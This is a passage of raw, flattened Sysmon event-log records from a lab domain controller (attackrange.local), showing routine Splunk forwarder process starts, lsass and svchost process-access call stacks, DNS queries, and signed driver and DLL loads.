Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.632{59A5CD1D-8E64-6005-7700-00000000A301}3832C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe8.0.2Monitor windows event logssplunk ApplicationSplunk Inc.splunk-winevtlog.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=A735F697C6C533F20D023E4318824194,SHA256=295236CFB06A5F9C1F76EECC468F9A070BFCB5C4E094918059EC86BBB654E119,IMPHASH=85F4904CF3562658E303E53274ABD436{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.048{59A5CD1D-8E44-6005-0B00-00000000A301}856_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.1460-C:\Windows\System32\lsass.exe 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.095{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.095{59A5CD1D-8E44-6005-0B00-00000000A301}85696C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.095{59A5CD1D-8E63-6005-7600-00000000A301}31723164C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002566Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002565Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002564Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002563Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002562Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002561Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002560Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002559Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002558Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002557Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.704{59A5CD1D-8E46-6005-0C00-00000000A301}596484C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002556Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.689{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002555Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.689{59A5CD1D-8E56-6005-3000-00000000A301}25323456C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002554Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.507{59A5CD1D-8E65-6005-7800-00000000A301}3212C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002553Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.048{59A5CD1D-8E56-6005-2E00-00000000A301}2464ocsp.digicert.com1460-C:\Windows\sysmon64.exe 22542200x80000000000000002552Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:28.006{59A5CD1D-8E56-6005-2C00-00000000A301}2588win-dc-4950fe80::16d:d52:d54:cffc;::ffff:10.0.1.14;C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe 22542200x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.939{59A5CD1D-8E44-6005-0B00-00000000A301}856_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.ATTACKRANGE.LOCAL.1460-C:\Windows\System32\lsass.exe 22542200x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:27.705{59A5CD1D-8E46-6005-1100-00000000A301}1172wpad1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002570Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:30.642{59A5CD1D-8E46-6005-1100-00000000A301}1172time.windows.com1460-C:\Windows\System32\svchost.exe 22542200x80000000000000002569Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}246465.199.90.95.in-addr.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002568Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}2464f.f.f.f.6.d.4.8.b.4.e.9.0.1.8.9.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002567Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:29.736{59A5CD1D-8E56-6005-2E00-00000000A301}24640.0.0.0.0.0.0.0.0.0.1.0.c.0.c.d.0.0.0.0.0.0.0.0.1.0.0.0.0.0.f.7.ip6.arpa.1460-C:\Windows\sysmon64.exe 644600x80000000000000002573Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.393C:\Windows\System32\drivers\xennet.sysMD5=7E6757CF81A305710B036475BCEDBC30,SHA256=9A5D7EAC527B6CDEC891C4A5C49FAF8599A1714078960DB87A7D72B0888A8987,IMPHASH=73F39C491797C6F3DFFBBE92FB638F34trueAmazon Web Services, Inc.Valid 644600x80000000000000002572Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.330C:\Windows\System32\drivers\xeniface.sysMD5=F1A750612F0ED79D435FA3D149331D69,SHA256=7416108B01624EBC62D5E200818D2A0AD08B8B87D13F65FDA716F7E7358C1CB1,IMPHASH=B7B4CB7750B42CE3E3BD994E129A5D9AtrueAmazon Web Services, Inc.Valid 644600x80000000000000002571Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:54.315C:\Windows\System32\drivers\xenvif.sysMD5=E7C0450691E0B3D00FC15E823FFEB779,SHA256=5C0755A4E1F4FFD7B4A442CF5E3A8CF7F0C69B1CAA2B11C67596D77E166CA419,IMPHASH=C119D28B8420C26CE25D996F6D25FD88trueAmazon Web Services, Inc.Valid 10341000x80000000000000002576Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002575Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002574Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:34.735{59A5CD1D-8E44-6005-0B00-00000000A301}856988C:\Windows\system32\lsass.exe{59A5CD1D-8E46-6005-1400-00000000A301}1304C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 22542200x80000000000000002580Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:33.939{59A5CD1D-8E56-6005-2E00-00000000A301}2464254.169.254.169.in-addr.arpa.1460-C:\Windows\sysmon64.exe 22542200x80000000000000002579Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:33.751{59A5CD1D-8E56-6005-2E00-00000000A301}2464255.1.0.10.in-addr.arpa.1460-C:\Windows\sysmon64.exe 734700x80000000000000002578Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:33:56.674{59A5CD1D-8E44-6005-0B00-00000000A301}856C:\Windows\System32\lsass.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography ManagerMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptdll.dllMD5=4B31902F1E0B79CE7E46D9877647C1CC,SHA256=8925892119315293C49D09A26191149660934BF1E5D3D023722E90339ADA38AA,IMPHASH=CAB6D6025DF08B0D0BC6259D625E2778trueMicrosoft WindowsValid 734700x80000000000000002577Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:14.908{59A5CD1D-8E56-6005-2B00-00000000A301}2628C:\Windows\System32\ismserv.exeC:\Windows\System32\cryptdll.dll10.0.14393.2969 (rs1_release.190503-1820)Cryptography 